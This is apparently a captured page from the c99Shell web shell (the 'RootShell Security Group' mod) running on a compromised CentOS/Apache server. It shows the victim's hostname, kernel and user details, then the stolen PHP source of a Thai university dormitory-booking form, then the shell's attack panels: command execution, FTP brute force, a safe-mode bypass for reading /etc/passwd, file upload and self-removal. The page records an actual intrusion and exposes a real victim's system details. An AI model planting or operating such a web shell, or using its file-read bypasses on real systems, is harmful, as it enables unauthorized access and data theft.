!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_add_domitory.php (4.52 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_std 
= isset($qu_std) ? $qu_std->row() : NULL;

$attributes = array('id' => 'myform''name' => 'myform');
echo 
form_open($this->config->item('sa_folder').$action.'/dmb_insert'$attributes);

$tmp $this->input->post('dmb_dm_id');
?>

<script>
jQuery(document).ready(function(){
    change_dm();
});

function change_dm () {
    var dmId = jQuery("#dmId").val();
    var tmp_rm = '<?echo $tmp;?>';
    if(dmId!=""){
        var url = "<?php echo site_url($this->config->item('sa_folder'));?>/general/getDmRm/"+dmId;
        xmlhttp = newXmlHttp();
        xmlhttp.open("GET", url, false);
        xmlhttp.send(null);
        if (xmlhttp.readyState==4 && xmlhttp.status==200) {
            var ret_text = xmlhttp.responseText;
            document.getElementById('showDmRm').innerHTML= ret_text;
            if(tmp_rm!=''){
                jQuery("#dmb_dm_id").val(tmp_rm);
            }
        }
    }
}
</script>
<table width="100%" border="0" align="center">
<?php
    
if (isset($qu_dmb)) {
?>
    <tr align="center">
        <td>ท่านได้จองหอพัก/ห้องพักแล้ว</td>
    </tr>
<?php
    
} else {
?>
    <tr align="center">
        <th>จองหอพัก/ห้องพัก<br /><br /></th>
    </tr>
    <tr>
        <td><table class="szone2" width="100%" border="0">
            <tr>
                <td width="25%" class="szone">ข้าพเจ้า</td>
                <td>
<?php
                
if (is_null($row_std)) {
?>
                <?php echo form_dropdown('dmb_pf_id'$rs_pf);?>
                <input type="text" id="dmb_name" name="dmb_name" value="<?php echo set_value('dmb_name');?>" size="10" maxlength="30" class="required-thai" />
                <input type="text" id="dmb_surname" name="dmb_surname" value="<?php echo set_value('dmb_surname');?>" size="10" maxlength="30" class="required-thai" />
                <span class="error">*<?php echo form_error('dmb_pf_id') ? form_error('dmb_pf_id') : (form_error('dmb_name') ? form_error('dmb_name') : form_error('dmb_surname'));?></span>
<?php
                
} else {
                    echo 
getval('prefixName'$row_std).getval('stdName'$row_std).' '.getval('stdSurname'$row_std);
?>
                <input type="hidden" id="dmb_std_id" name="dmb_std_id" value="<?php echo getval('stdId'$row_std);?>" />
                <input type="hidden" id="dmb_pf_id" name="dmb_pf_id" value="<?php echo getval('stdPfId'$row_std);?>" />
                <input type="hidden" id="dmb_name" name="dmb_name" value="<?php echo getval('stdName'$row_std);?>" />
                <input type="hidden" id="dmb_surname" name="dmb_surname" value="<?php echo getval('stdSurname'$row_std);?>" />
<?php
                
}
?>
                </td>
                <td class="szone">เลขที่บัตรประชาชน</td>
                <td>
<?php
                
if (is_null($row_std)) {
?>
                <input type="text" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo set_value('dmb_citizen_id');?>" size="13" maxlength="13" class="required-int" />
                <span class="error">* <?php echo form_error('dmb_citizen_id');?></span>
<?php
                
} else {
                    echo 
getval('sdtCitizenId'$row_std);
?>
                <input type="hidden" id="dmb_citizen_id" name="dmb_citizen_id" value="<?php echo getval('sdtCitizenId'$row_std);?>" />
<?php
                
}
?>
                </td>
            </tr>
            <tr>
                <td class="szone">หลักสูตร</td>
                <td colspan="3">
<?php
                
if (is_null($row_std)) {
                    echo 
form_dropdown('dmb_cur_id'$rs_cur);
?>
                <span class="error">* <?php echo form_error('dmb_cur_id');?></span>
<?php
                
} else {
                    echo 
getval('curName'$row_std);
?>
                <input type="hidden" id="dmb_cur_id" name="dmb_cur_id" value="<?php echo getval('stdCurId'$row_std);?>" />
<?php
                
}
?>
                </td>
            </tr>
            <tr>
                <td class="szone">มีความประสงค์จะจองหอพัก</td>
                <td colspan="3">
<?php
                $js 
"id=\"dmId\" onChange=\"change_dm()\"";
                echo 
form_dropdown('dftDmId'$rs_dmsetValue('dftDmId'$row_std), $js);
?>
                <span class="error">* <?php echo form_error('dftDmId');?></span></td>
            </tr>
            <tr>
                <td class="szone">ห้องพัก</td>
                <td colspan="3"><div id="showDmRm"></div>
                <span class="error"><?php echo form_error('dmb_dm_id');?></span></td>
            </tr>
            <tr>
                <td class="szone">ภาค/ปีการศึกษา</td>
                <td colspan="3"><?php echo $tmId;?>/<?php echo $acY;?>
                <input type="hidden" id="dmb_year" name="dmb_year" value="<?php echo $acY;?>" />
                <input type="hidden" id="dmb_tm_id" name="dmb_tm_id" value="<?php echo $tmId;?>" /></td>
            </tr>
            <tr>
                <td colspan="4" align="center">
                <input type="submit" name="add" id="add" value="บันทึก" />
                <input type="reset" name="clear" id="clear" value="เคียร์ข้อมูล" /></td>
        </table></td>
    </tr>
<?php
    
}
?>
</table>
<?php echo form_close();?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--